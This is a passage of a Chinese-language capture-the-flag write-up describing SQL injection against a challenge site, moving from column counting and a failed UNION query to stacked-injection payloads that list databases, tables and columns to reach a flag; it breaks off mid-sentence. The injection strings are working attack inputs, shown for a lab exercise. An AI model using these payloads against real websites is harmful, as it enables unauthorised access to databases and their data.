开始注入:
1’ : 报错
1’ #:回显正常
1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜)
1’ union select 1,2#: 回显 如图
看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入:
库:1’;show databases;#
得到数据库
表:1’;show tables;#
得到俩个表
列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 “ 注:在网上百度发现
得到 一个带有flag的字段 和 另一个 可查询的表
flag表:可查询表:
到这里虽然发现flag 但是select已经被ban了所